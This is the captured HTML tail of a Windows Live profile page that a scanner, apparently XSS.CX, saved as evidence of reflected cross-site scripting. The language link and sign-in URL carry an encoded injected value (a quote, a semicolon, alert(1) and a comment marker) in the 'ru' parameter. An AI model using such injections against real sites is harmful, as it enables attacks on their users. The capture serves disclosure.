<div id="Ad300x250_0" style="overflow:hidden;width:300px;height:250px;" name="Advertisement" >

</div>
</div>
</div>
</div>
<div id="m_wmsn"></div>



</div><div class="c_clr"></div>
</div>
<div class="c_clr"></div><script type="text/javascript">
var $AdConfig = {
Data:[['Ad300x250_0','&PG=RENUS1&AP=1089&SDN=WL4',300,250,'Ad300x250','','RENUS1','',0],['Crm120x60_0','&PG=RENUS7&AP=1499&SDN=WL4',120,60,'Crm120x60','','RENUS7','',0]],
itod:{'Ad300x250_0' : 0,'Crm120x60_0' : 1},
mi:2,
ar:1,
rd:1000,
crmrd:0,
burl:'http://secure.wlxrs.com/$live.controls.images/ad/w4/',
ext:'.jpg',
ear:false,
dSDTags:true,
dPVTag:false,
rx_SCT:'\x5e\x5bA-Za-z0-9\x5d\x7b1,50\x7d\x24',
usi:10,
uso:3,
eups:true,
pcss: '',
phtml: '/handlers/adpopover.mvc?admkt=en-us&ver=1',
pjs: '',
dp: false,
pd: 50,
intad:false,
cadrsn: '102',
furl: '/handlers/adfeedback.mvc?adid={0}&pid={1}&targetid={2}&adurl={3}&pg={4}&reason={5}&canary={6}&desc={7}&admkt=en-us',
fcan: 'TwiMZj\x2fspv8\x2bh0c793wCL7sXy6gzEKT7nh\x2ftOul67sQ\x3d3',
ss : {rurl:'',hnegurl:'?hostdm=!domain!',hs:'',srmad:''}
};
</script>

<div id="m_wf" class="m_wfp">
<table id="uxp_ftr_control" cellpadding="0" cellspacing="0">
<tr>
   <td id="uxp_ftr_left">
       <ul>
       
<li><span id="uxp_ftr_link_trademark">&copy; 2011 Microsoft</span></li>
<li><a id="uxp_ftr_link_legal" target="_top" href="http&#58;//g.msn.com/0TO_/enus">Terms</a></li>
           <li><a id="uxp_ftr_link_privacy" target="_top" href="http&#58;//go.microsoft.com/fwlink/&#63;LinkId&#61;74170">Privacy</a></li><li><a id="uxp_ftr_link_aboutads" target="_top" href="http&#58;//g.msn.com/AIPRIV/en-us">About our ads</a></li><li><a id="uxp_ftr_link_advertise" target="_top" href="http&#58;//g.live.com/9uxp9ad/adv-en-us&#63;&#63;su&#61;http&#58;//shared.live.com/Live.Profile">Advertise</a></li></ul>
   </td>
   <td id="uxp_ftr_right">
       <table id="uxp_ftr_right_nest" cellpadding="0" cellspacing="0">
       <tr>
           <td>        
               <ul>

<li><a id="uxp_ftr_link_custom1" target="_top" href="http&#58;//help.live.com/help.aspx&#63;mkt&#61;en-US&#38;project&#61;tou&#38;querytype&#61;keyword&#38;query&#61;coc">Code of Conduct</a></li>

<li><a id="uxp_ftr_link_custom2" target="_top" href="http&#58;//support.live.com/default.aspx&#63;productKey&#61;WLProfileAbuse">Report abuse</a></li>

                   <li><a id="uxp_ftr_link_help" target="_blank" href="http&#58;//explore.live.com/windows-live-profile-help-center">Help Center</a></li>
                   <li><a id="uxp_ftr_link_feedback" target="_top" href="http&#58;//g.live.com/9uxp9en-us/ftr4&#63;productkey&#61;WLProfile">Feedback</a></li><li><a id="uxp_ftr_link_language" target="_top" href="http&#58;//home.live.com/options/language&#63;ru&#61;http&#37;3a&#37;2f&#37;2fcid-6960b47ef00cd343.profile.live.com&#37;2fdetails&#37;2f&#37;3fru&#37;3dhttp&#37;253a&#37;252f&#37;252fco102w.col102.mail.live.com&#37;252fmail&#37;252fContactMainLight.aspx&#37;253fn&#37;253d378362732557e&#37;27&#37;253balert&#37;281&#37;29&#37;2f&#37;2fad55bbd00c2">English</a></li></ul>
           </td>
       </tr>
       </table>
   </td>
</tr>
</table>
</div>
</div>
</div><script type="text/javascript">//<![CDATA[
$CSIPerf.lapse.push({s:"ac",t:(new Date).getTime()})
//]]></script><div id="m_whm"><div id="c_hmc" style="display:none"><ul id="c_ht_mail"><li><a href="http://mail.live.com/?rru=inbox">Inbox</a></li><li><a href="http://calendar.live.com/calendar/calendar.aspx">Calendar</a></li><li><a href="http://mail.live.com/?rru=contacts">Contacts</a><span class="c_ms"></span></li><li><a href="http://mail.live.com/?rru=compose">Send email</a></li></ul><ul id="c_ht_docs"><li><a href="http://office.live.com/">Recent documents</a></li><li><a href="http://office.live.com/documents.aspx">Your documents</a></li><li><a href="http://groups.live.com/">Your groups</a><span class="c_ms"></span></li><li><a href="https://office.live.com/newlivedocument.aspx?xt=docx"><span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png);background-position:-94px -8px;width:16px;height:16px;" src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/is/invis.gif" alt=""/></span> New Word document</a></li><li><a href="https://office.live.com/newlivedocument.aspx?xt=xlsx"><span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png);background-position:-62px -8px;width:16px;height:16px;" src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/is/invis.gif" alt=""/></span> New Excel workbook</a></li><li><a href="https://office.live.com/newlivedocument.aspx?xt=pptx"><span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png);background-position:-78px -8px;width:16px;height:16px;" src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/is/invis.gif" alt=""/></span> New PowerPoint presentation</a></li><li><a href="https://office.live.com/newlivedocument.aspx?xt=one"><span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png);background-position:-46px -8px;width:16px;height:16px;" src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/is/invis.gif" alt=""/></span> New OneNote notebook</a></li></ul><ul id="c_ht_photos"><li><a href="http://photos.live.com/">Recent photos</a></li><li><a href="http://photos.live.com/albums.aspx">Your albums</a></li><li><a href="http://photos.live.com/peopletags.aspx">Photos of you</a><span class="c_ms"></span></li><li><a href="http://photos.live.com/choosefolder.aspx">Share photos</a></li></ul><ul id="c_ht_msn"><li><a href="http://g.live.com/9uxp9msn/mhm-en-us??su=http://shared.live.com/Live.Profile">Home</a><span class="c_ms"></span></li><li><a href="http://g.live.com/9uxp9msn/mau-en-us??su=http://shared.live.com/Live.Profile">Autos</a></li><li><a href="http://g.live.com/9uxp9msn/mga-en-us??su=http://shared.live.com/Live.Profile">Games</a></li><li><a href="http://g.live.com/9uxp9msn/mmo-en-us??su=http://shared.live.com/Live.Profile">Money</a></li><li><a href="http://g.live.com/9uxp9msn/mmv-en-us??su=http://shared.live.com/Live.Profile">Movies</a></li><li><a href="http://g.live.com/9uxp9msn/mmu-en-us??su=http://shared.live.com/Live.Profile">Music</a></li><li><a href="http://g.live.com/9uxp9msn/mnw-en-us??su=http://shared.live.com/Live.Profile">News</a></li><li><a href="http://g.live.com/9uxp9msn/msp-en-us??su=http://shared.live.com/Live.Profile">Sports</a></li><li><a href="http://g.live.com/9uxp9msn/mwe-en-us??su=http://shared.live.com/Live.Profile">Weather</a></li></ul><ul index="0" r="Header" maxc="0" id="c_mm_clc0" class="c_mm_clc c_mm_clcHeader t_hovl c_m"><li id="c_mm_links0" class="c_mm_links"><ul><li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a></li><li><a href="http://profile.live.com/" target="_top">Profile</a><span class="c_ms"></span></li><li><a href="http://profile.live.com/connect/" target="_top">Add friends</a></li></ul></li></ul></div></div>
<script type="text/javascript">//<![CDATA[
var $Config={"BSI":{"enabled":1,"xid":"9e627d2f-7eba-45bb-8d7e-b7c700d62bb0","pn":"Contact.default.F.U","rid":"001463c3951","biciPrevious":"9e627d2f-7eba-45bb-8d7e-b7c700d62bb0_001463c3951_13263","BICI":{"fid":"463c","urlHash":"hnsfH","beaconUrl":"\u002f\u002fc.live.com\u002fc.gif\u003fDI\u003d13263\u0026wlxid\u003d9e627d2f-7eba-45bb-8d7e-b7c700d62bb0\u0026reqid\u003d001463c3951","enableLD":1,"enableGlinkExtra":1,"enableGlinkCall":1},"SBSPLT":{"rt":"634326993710279749","render":0,"enabled":0},"CSIPerf":{"enabled":1,"pltImg":"\u002fHandlers\u002fPLTImage.mvc","pltTransList":"","transactionLimit":50,"maxSessionDuration":240,"page":{"landingPageName":"","timeStamp":""},"IDSS":{"enabled":1,"sampleFrequency":1},"Omniture":{"enabled":0,"sampleFrequency":1000,"serverUrl":"\u002f\u002fmsnportal.112.2o7.net\u002fb\u002fss\u002fmsnportalhotmail\u002f1\u002fH.1-pdv-2\u002f","delimiter":"\u0026"},"WLXFD":{"enabled":1,"sampleFrequency":100,"delimiter":"\u0026"},"Trace":{"enabled":1,"sampleFrequency":100,"enableReportEvent":1},"jsVersion":"15.40.1208"},"Watson":{"enabled":1,"sr":100}},"mkt":"en-US","mmn":"BL2xxxxxC622","di":13263,"prop":"SN.Profile","sd":".live.com","hn":"cid-6960b47ef00cd343.profile.live.com","WS":{"SL":{"url":"http\u003a\u002f\u002flink.live.net\u002f"}},"Header":{"baseUrl":"http\u003a\u002f\u002fjs.wlxrs.com\u002f-e4i8V2Q-lQZD9iI\u00210eswg\u002f"},"Flash":{"Major":9,"Min":0,"Rev":124,"Cookie":"sn_flash","NoFlashHtml":"\u003ca href\u003d\u0022http\u003a\u002f\u002fwww.macromedia.com\u002fgo\u002fgetflashplayer\u0022 target\u003d\u0022_blank\u0022\u003e\u003cimg src\u003d\u0022http\u0026\u002358\u003b\u002f\u002fmsc.wlxrs.com\u002fwWNOMylNg2OOvvy2om0D7Q\u002fnoflash.gif\u0022 alt\u003d\u0022\u0022 \u002f\u003e\u003cbr \u002f\u003eDownload the latest version of Flash to view this content\u003c\u002fa\u003e"},"ip":"173.193.214.243","cid":"UnAuth","email":"UnAuth","Themes":{"baseUrl":"http\u003a\u002f\u002fcss.wlxrs.com\u002fHGjlAVvMlW6-1\u0021iEEpuBkgo2TZKpU8RH1wdoo5rx6p3x-sVokzTifn4kt2LqQTjuq-nexqk1fr3mZ3SQtqscWud7R41QryMvs57TghM7Qc3mY37L6whfQQ\u002f","current":"base","version":"15.40.1211","url":"http\u003a\u002f\u002fcss.wlxrs.com\u002fHGjlAVvMlW6-1\u0021iEEpuBkgo2TZKpU8RH1wdoo5rx6p3x-sVokzTifn4kt2LqQTjuq-nexqk1fr3mZ3SQtqscWud7R41QryMvs57TghM7Qc3mY37L6whfQQ\u002fbase\u002f15.40.1211\u002f","genService":"\u002fHandlers\u002fThemeCss.mvc\u003ftheme\u003d\u007bthemeid\u007d\u0026version\u003d\u007bversion\u007d","uniqueServiceParams":"CSSTemplates\u003ddefault\u00252cie\u0026IsRTL\u003dFalse\u0026LangDirection\u003dltr\u0026Left\u003dleft\u0026Right\u003dright\u0026IsMobile\u003dFalse\u0026IsBirthday\u003dFalse\u0026Weather\u003dClear\u0026TimeOfDay\u003d12"}};var $wn_le="\u003cimg class\u003d\u0027c_wn_ld\u0027 src\u003d\u0027http\u003a\u002f\u002fsecure.wlxrs.com\u002f\u0024live.controls.images\u002fwn\u002fprogress_loading_2.gif\u0027, alt\u003d\u0027\u0027\u002f\u003e\u003cspan\u003eLoading...\u003c\u002fspan\u003e";var $wn_em="We\u0027re having trouble getting your feed right now. Please check back later.";var $wn_d="Remove this update";var $wn_n="Hide updates from \u007b0\u007d";var $wn_a="Hide updates from \u007b0\u007d";var $wn_af="Add \u007b0\u007d as a favorite\u007b1\u007d";var $wn_rf="Remove \u007b0\u007d as a favorite\u007b1\u007d";var $wn_ot="More options";var $wn_pt="Permissions";var $wn_oa="Options";var $wn_oi="http\u003a\u002f\u002fsecure.wlxrs.com\u002f\u0024live.controls.images\u002fwn\u002fCog_Blue_16x16-8.png";var $wn_afmf="You\u0027ve hidden updates from \u007bappname\u007d in your feed. \u003ca href\u003d\u0022http\u003a\u002f\u002fsupport.live.com\u002fdefault.aspx\u003fproductkey\u003dwlmessengerconnectabuse\u0026mkt\u003den-US\u0026ct\u003deformts\u0026\u007b\u0021\u007dappID\u003d\u007bai\u007d\u0026\u007b\u0021\u007dappName\u003d\u007banp\u007d\u0026\u007b\u0021\u007dpublisherCID\u003d\u007bcid\u007d\u0026\u007b\u0021\u007dactivitytitle\u003d\u007bat\u007d\u0026\u007b\u0021\u007dsourceurl\u003dwhatsnew\u0022 target\u003d\u0022_blank\u0022\u003eReport \u007bappname\u007d updates as spam\u003c\u002fa\u003e";var $wnup_dm="h";var $wnup_du="\u002fHandlers\u002fWhatsNewDismissServices.mvc\u003fdc\u003dHELvfegf\u00252f0nt4qvnHLmkCudmz9p7WGaWwj0NsbVG6jI\u00253d2";var $SBC={"utfb":"http\u003a\u002f\u002fsecure.wlxrs.com\u002f\u0024live.controls.images\u002fic\u002fbluemann.png","imgsBase":"http\u003a\u002f\u002fsecure.wlxrs.com\u002f\u0024live.controls.images\u002f","sendEmail":"Send email","searchEmail":"Search email","sendMsg":"Send message","viewPhotos":"View photos","canary":"","ufs":"\u002fhandlers\u002fsearchapijson.mvc","prof":"http\u003a\u002f\u002fcid-\u007b0\u007d.profile.live.com\u002f","bingAuto":"http\u003a\u002f\u002fapi.search.live.net\u002fqson.aspx","bingUrl":"http\u003a\u002f\u002fbing.com\u002fsearch","homeSerp":"http\u003a\u002f\u002fhome.live.com\u002fsearch","queryInterval":50,"bgImage":"http\u003a\u002f\u002fsecure.wlxrs.com\u002f\u0024live.controls.images\u002fsb\u002fbingLogo.png","https":0,"bingSupport":1,"emailFrom":"Search email from","emailTo":"Search email sent to","emailHead":"Search email","from":"from\u003a","to":"to\u003a","subject":"subject\u003a","max":3,"bgLoadDelay":50,"auth":0,"ldImg":"http\u003a\u002f\u002fsecure.wlxrs.com\u002f\u0024live.controls.images\u002fwn\u002fprogress_loading_2.gif","sendEmailLink":"http\u003a\u002f\u002fmail.live.com\u002f\u003frru\u003dcompose\u00253faction\u00253dcompose\u002526to\u00253d\u007baddress\u007d\u0026ru\u003d\u007bru\u007d","dateOffset":7,"lt":10000,"profDet":"http\u003a\u002f\u002fcid-.profile.live.com\u002fdetails\u003fcontactid\u003d\u007b0\u007d","docsAction":"http\u003a\u002f\u002fcid-.skydrive.live.com\u002fredir.aspx\u003fpage\u003d\u007b0\u007d\u0026resid\u003d\u007b1\u007d","docsEdit":"Edit in browser","docsProperty":"View properties","firstHead":"Search contacts","secondHead":"","bingHead":"Search the web"};
//]]></script>

<script type="text/javascript">//<![CDATA[
function SM_Check(f){SM_Check.i=SM_Check.i||[];var e=0,i=f.length,c=window["$Config"],b=c&&c.BSI,a=b&&b.Watson;if(a&&a.enabled)for(;e<i;e++){var h=f[e];if(typeof window[h]=="undefined")try{var d="//"+c.hn+"/handlers/Watson.mvc";if(a.url)d=a.url;var g=new Image;d=d+"?xid="+b.xid+"&rid="+b.rid+"&di="+c.di+"&pn="+b.pn+"&mmn="+c.mmn+"&ec=54&msg="+h+"&sr="+a.sr;g.src=d;SM_Check.i.push(g)}catch(j){}}}
//]]></script>
<script type="text/javascript" src="http://js.wlxrs.com/gsFN2MaCGSnDwH5gRXEFxQ/liteframework.js" ></script>
<script type="text/javascript">//<![CDATA[
if(typeof($Version)=="undefined"){{document.write('\<script type="text/javascript" src="http://js.wlxrs.com/gsFN2MaCGSnDwH5gRXEFxQ/liteframework.js"\>\</scr' + 'ipt\>')}}
//]]></script>
<script type="text/javascript">//<![CDATA[
SM_Check(['$Version']);$Config.baseUrl='http://js.wlxrs.com/gsFN2MaCGSnDwH5gRXEFxQ/';
//]]></script><script type="text/javascript">//<![CDATA[
new function(){var a=['http\x3a\x2f\x2fmsc.wlxrs.com\x2fsdeecqP9ZZxWiQxEpdWJFg\x2fWeb\x2fscript\x2fwebfoundation.js', 'http\x3a\x2f\x2fjs.wlxrs.com\x2fyp7W9xUuIPXv6swFMFOIvA\x2fSearchBox.js', 'http\x3a\x2f\x2fads1.msn.com\x2flibrary\x2fdap.js', 'http\x3a\x2f\x2fmsc.wlxrs.com\x2fsdeecqP9ZZxWiQxEpdWJFg\x2fWeb\x2fscript\x2fcontactdetailsvisitorview.js'],i,b=a.length;for(i=0;i<b;i++){_d.write('<script type="text/javascript" src="'+a[i]+'"><\/script>');}}
//]]></script><script type="text/javascript">//<![CDATA[
SM_Check(['\x24f']);
//]]></script>






<script type="text/javascript" language="javascript">

if (!!window["Spaces"] && !!Spaces.LoadMonitor)
{
Spaces.LoadMonitor.CompleteComponent(Spaces.LoadMonitor.strPltId);
}

</script>
<!-- ImfId-021904b0-7e2c-4cbf-8ff4-41473e9f6cf7 -->



<script type="text/javascript">window.$Ads && $Ads.Init();</script><img src="//switch.atdmt.com/action/WL_en_US_Live_Profile_landingUnauth" style="display:none;height: 1px;width:1px" /><script type="text/javascript">//<![CDATA[
window.ic_common_data = {
"imgbaseurl":"http\u003a\u002f\u002fsecure.wlxrs.com\u002f\u0024live.controls.images\u002fic\u002f",
"socialcontext":"0",
"vcid":"0000000000000000",
"max_name":"20",
"tp_no_name":"View photos of this person",
"afcanary":"",
"ru":location.href,
"dmtrgt":"_top"};
window.ic_menu_data = {
"af":['Add to favorites',''],
"gr":['View group','http\x3a\x2f\x2fcid-\x24cid\x24.groups.live.com\x2f'],
"pr":['View profile','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2f'],
"ed":['Edit details','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fdetails\x2f'],
"vd":['View details','http\x3a\x2f\x2fcid-.profile.live.com\x2fdetails\x2f\x3fcontactId\x3d\x7bcontactid\x7d'],
"se":['Send email',"mailto\u003a\u007baddress\u007d"],
"sm":['Send message','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fmessages\x2fcompose.aspx\x3ftoCid\x3d\x7baddress\x7d\x26returnUrl\x3d\x7bru\x7d\x26mkt\x3den-us'],
"si":['Send IM'],
"ss":['Send text message'],
"c1":['Add as friend','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fconnect\x2fsend.aspx\x3fname\x3d\x7bname\x7d\x26scontext\x3d\x7bscxt\x7d\x26ru\x3d\x7bru\x7d\x26mkt\x3den-us'],
"c4":['View invitation','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fconnect\x2fsend.aspx\x3fname\x3d\x7bname\x7d\x26scontext\x3d\x7bscxt\x7d\x26ru\x3d\x7bru\x7d\x26mkt\x3den-us'],
"c2":['Add to Messenger','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fconnect\x2fsend.aspx\x3fname\x3d\x7bname\x7d\x26scontext\x3d\x7bscxt\x7d\x26ru\x3d\x7bru\x7d\x26mkt\x3den-us'],
"c3":['Add to your profile','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fconnect\x2fsend.aspx\x3fname\x3d\x7bname\x7d\x26scontext\x3d\x7bscxt\x7d\x26ru\x3d\x7bru\x7d\x26mkt\x3den-us'],
"dc":['View documents','http\x3a\x2f\x2fcid-\x24cid\x24.skydrive.live.com\x2fhome.aspx'],
"ve":['Find email','http\x3a\x2f\x2fmail.live.com\x2f\x3frru\x3d\x7brru\x7d'],
"ph":['View photos','http\x3a\x2f\x2fcid-\x24cid\x24.skydrive.live.com\x2falbums.aspx'],
"ct":['View contact info','http\x3a\x2f\x2fmail.live.com\x2f\x3frru\x3dcontacts\x253fcontact\x253d\x7bcontactid\x7d'],
"cp":['Change picture','http\x3a\x2f\x2fcid-.profile.live.com\x2fdetails\x2fEditPic.aspx'],
"pr3":['View profile \x7b0\x7d'],
"ph3":['View photos \x7b0\x7d'],
"sm3":['Send message \x7b0\x7d']};
window.ic_control_data = {
"ic2":["6960b47ef00cd343","1",["sm","ph","pr"],"Someone on Windows Live","","7593267429032907587","","11\u003a7593267429032907587","a"],
"ic3":["6960b47ef00cd343","",[],"Someone on Windows Live","","7593267429032907587","","11\u003a7593267429032907587","a"],
"ic1":["","1",["cp"],"Someone on Windows Live","","0","","","a"]};
window.ic_template_data = {};
if(typeof($ic)!='undefined'&&typeof($ic.ic)!='undefined'){$ic.ic.init();}
//]]></script><script type="text/javascript">//<![CDATA[
$CSIPerf.lapse.push({s:"f",t:(new Date).getTime()})
//]]></script>

<!-- MLHN:BL2xxxxxC622 -->
</body>



<script type="text/javascript">//<![CDATA[
var sn_frInvite = new $sn_frInviter(new $sn_fetcher({
"okHtml":"Close",
"errorHtml":"Something happened and we can\u0026\u002339\u003bt add this person right now. Please try again later.",
"loadingHtml":"\u003cimg style\u003d\u0022vertical-align\u003amiddle\u0022 src\u003d\u0022http\u003a\u002f\u002fmsc.wlxrs.com\u002fE5R-c9YKVHPfKPxCZFwrkA\u002fimages\u002fprogress_loading.gif\u0022\u002f\u003e\u0026nbsp\u003b\u003cspan style\u003d\u0022vertical-align\u003amiddle\u0022\u003eLoading...\u003c\u002fspan\u003e",
"usePopover":true,
"canary":"y6QCS2VJiUeHFDEA9DXb53X9WmGOiX5ZHbnHMVVblxM\u003d3",
"baseUrl":"\u002fhandlers\u002ffriendinvite\u002f"}),{
"m0":{
"recipientName":"",
"recipientId":"c6960b47ef00cd343",
"attachElId":"sn_pp_cb_cnct"},
"m1":{
"recipientName":"",
"recipientId":"c6960b47ef00cd343",
"attachElId":"sn_pp_sm_cnct"}},{},{
"signInUrl":"https\u003a\u002f\u002flogin.live.com\u002flogin.srf\u003fwa\u003dwsignin1.0\u0026rpsnv\u003d11\u0026ct\u003d1297102571\u0026rver\u003d6.1.6206.0\u0026wp\u003dMBI\u0026wreply\u003dhttp\u003a\u00252F\u00252Fcid-6960b47ef00cd343.profile.live.com\u00252Fdetails\u00252F\u00253Fru\u00253Dhttp\u0025253a\u0025252f\u0025252fco102w.col102.mail.live.com\u0025252fmail\u0025252fContactMainLight.aspx\u0025253fn\u0025253d378362732557e\u002527\u0025253balert\u00281\u0029\u00252F\u00252Fad55bbd00c2\u0026lc\u003d1033\u0026id\u003d73625\u0026mkt\u003den-US"});
//]]></script>
<div id="cxp_ic_usertiles" style="display:none"></div><script type="text/javascript" defer="defer">//<![CDATA[
window.cxp_ic_common_data = {
"imgbaseurl":"http\u003a\u002f\u002fsecure.wlxrs.com\u002f\u0024live.controls.images\u002fic\u002f",
"showpresence":"1",
"webpresence":"0",
"socialcontext":"0",
"vcid":"0000000000000000",
"p_av":"",
"p_b":"",
"p_aw":"",
"p_off":"",
"max_name":"20",
"tp_no_name":"View photos of this person",
"ru":location.href};
window.cxp_ic_menu_data = {
"ut":["","",''],
"dn":["","",''],
"ps":["","",''],
"ev":['View event','http\x3a\x2f\x2fcid-\x24cid\x24.home.events.live.com\x2f',''],
"gr":['View group','http\x3a\x2f\x2fcid-\x24cid\x24.groups.live.com\x2f',''],
"pr":['View profile','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2f',''],
"se":['Send email',"mailto\u003a\u007baddress\u007d",''],
"sm":['Send message','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fmessages\x2fcompose.aspx\x3ftoCid\x3d\x7baddress\x7d\x26returnUrl\x3d\x7bru\x7d\x26mkt\x3den-us',''],
"si":['Send IM',"",''],
"mc":["","",''],
"c1":['Add as friend','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fconnect\x2fsend.aspx\x3fname\x3d\x7bname\x7d\x26scontext\x3d\x7bscxt\x7d\x26ru\x3d\x7bru\x7d\x26mkt\x3den-us',''],
"c4":['','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fconnect\x2fsend.aspx\x3fname\x3d\x7bname\x7d\x26scontext\x3d\x7bscxt\x7d\x26ru\x3d\x7bru\x7d\x26mkt\x3den-us',''],
"c2":['Add to Messenger','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fconnect\x2fsend.aspx\x3fname\x3d\x7bname\x7d\x26scontext\x3d\x7bscxt\x7d\x26ru\x3d\x7bru\x7d\x26mkt\x3den-us',''],
"c3":['Add to your profile','http\x3a\x2f\x2fcid-\x24cid\x24.profile.live.com\x2fconnect\x2fsend.aspx\x3fname\x3d\x7bname\x7d\x26scontext\x3d\x7bscxt\x7d\x26ru\x3d\x7bru\x7d\x26mkt\x3den-us',''],
"ph":['View photos','http\x3a\x2f\x2fcid-\x24cid\x24.skydrive.live.com\x2falbums.aspx',''],
"tp":['View photos of \x7bname\x7d','http\x3a\x2f\x2fcid-\x24cid\x24.skydrive.live.com\x2fpeopletags.aspx',''],
"ct":['View contact info','http\x3a\x2f\x2fmail.live.com\x2f\x3frru\x3dcontacts\x253fcontact\x253d\x7bcontactid\x7d','']};
window.cxp_ic_control_data = {};
if(typeof($cxp_ic)!='undefined'&&typeof($cxp_ic.ic)!='undefined'){$cxp_ic.ic.init();}
//]]></script>




</html>

Report generated by XSS.CX at Thu Feb 10 09:08:36 CST 2011.